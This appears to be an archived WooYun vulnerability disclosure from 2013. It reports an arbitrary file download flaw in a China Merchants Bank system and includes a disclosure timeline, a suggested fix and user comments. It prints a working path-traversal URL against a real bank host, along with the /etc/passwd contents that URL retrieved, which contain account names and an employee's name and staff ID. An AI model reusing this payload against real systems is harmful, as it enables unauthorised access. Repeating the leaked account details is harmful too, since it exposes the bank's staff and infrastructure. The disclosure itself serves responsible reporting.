破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

招商银行某系统任意文件下载漏洞

编号40001
Urlhttp://www.wooyun.org/bug.php?action=view&id=40001
漏洞状态已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞标题招商银行某系统任意文件下载漏洞
漏洞类型任意文件遍历/下载
厂商招商银行
白帽子想要减肥的胖纸
提交日期2013-10-17 08:12:00
公开日期2013-12-01 08:13:00
修复时间(not set)
确认时间2013-10-21 00:00:00
Confirm Spend4
漏洞标签任意文件读取
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank10
漏洞简介
可以读取到各种信息,可惜不是root权限。。。
漏洞细节

可以download任意文件。。请联系开发商进行整改

POC

root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:6:12::/var/adm/invscout:/usr/bin/ksh
snapp:*:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
ipsec:*:201:1::/etc/ipsec:/usr/bin/ksh
nuucp:*:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
pconsole:*:8:0::/var/adm/pconsole:/usr/bin/ksh
esaadmin:*:10:0::/var/esa:/usr/bin/ksh
sshd:*:202:201::/var/empty:/usr/bin/ksh
ucmdb:!:203:1:UCMDB_probe_user-20111213:/home/ucmdb:/usr/bin/ksh
qadmsom:!:0:0:SOMOwner-SOM-20111213-C22018:/home/qadmsom:/usr/bin/ksh
qdevsom:!:205:1:SOM Developer_user-20111213:/home/qdevsom:/usr/bin/ksh
atmpusr:!:206:1:-ATM前置用户-蔡承杰/074327-20090310-:/ibp/atmpusr:/usr/bin/ksh
db2inst1:*:207:204:-db2客户端实例用户-#-20090309-:/home/db2inst1:/usr/bin/ksh
trsdb:*:209:1::/trsdb:/usr/bin/ksh
trsuser:*:208:1::/home/trsuser:/usr/bin/ksh
itmuser:*:204:205::/tivoli:/usr/bin/ksh
operator:!:770:1:RS6K组日常维护账户-ALL-2013-06-17.18.40.43-C71084:/home/operator:/usr/bin/ksh
dbmonusr:*:760:760:DBA日常值班维护账户-ALL-2013-06-21.19.39.21-C70907:/home/dbmonusr:/usr/bin/ksh


url
http://search.cmbchina.com/cmb/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd

修复方案

正则 过滤../限制并限制访问文件类型

状态信息 2013-10-17: 细节已通知厂商并且等待厂商处理中
2013-10-21: 厂商已经确认,细节仅向厂商公开
2013-10-31: 细节向核心白帽子及相关领域专家公开
2013-11-10: 细节向普通白帽子公开
2013-11-20: 细节向实习白帽子公开
2013-12-01: 细节向公众公开
厂商回复CNVD确认并复现所述情况,已经在17号上午转由CNCERT通报招行银行,招商银行反馈在17日下午已经着手处置。
rank 10
回应信息危害等级:中漏洞Rank:10 确认时间:2013-10-21 22:20
Showing 1-5 of 5 items.
评论内容评论人点赞数评论时间

@xsser 同学在里面做码农 年薪30

woody02013-10-22 08:58:00

开门!政府送温暖~

M4sk02013-10-17 13:49:00

@xsser 能update才好嘛

ppt02013-10-17 11:39:00

要是可以download工资表就好了

xsser02013-10-17 09:31:00

knock,knock,查水表

黑云02013-10-17 09:28:00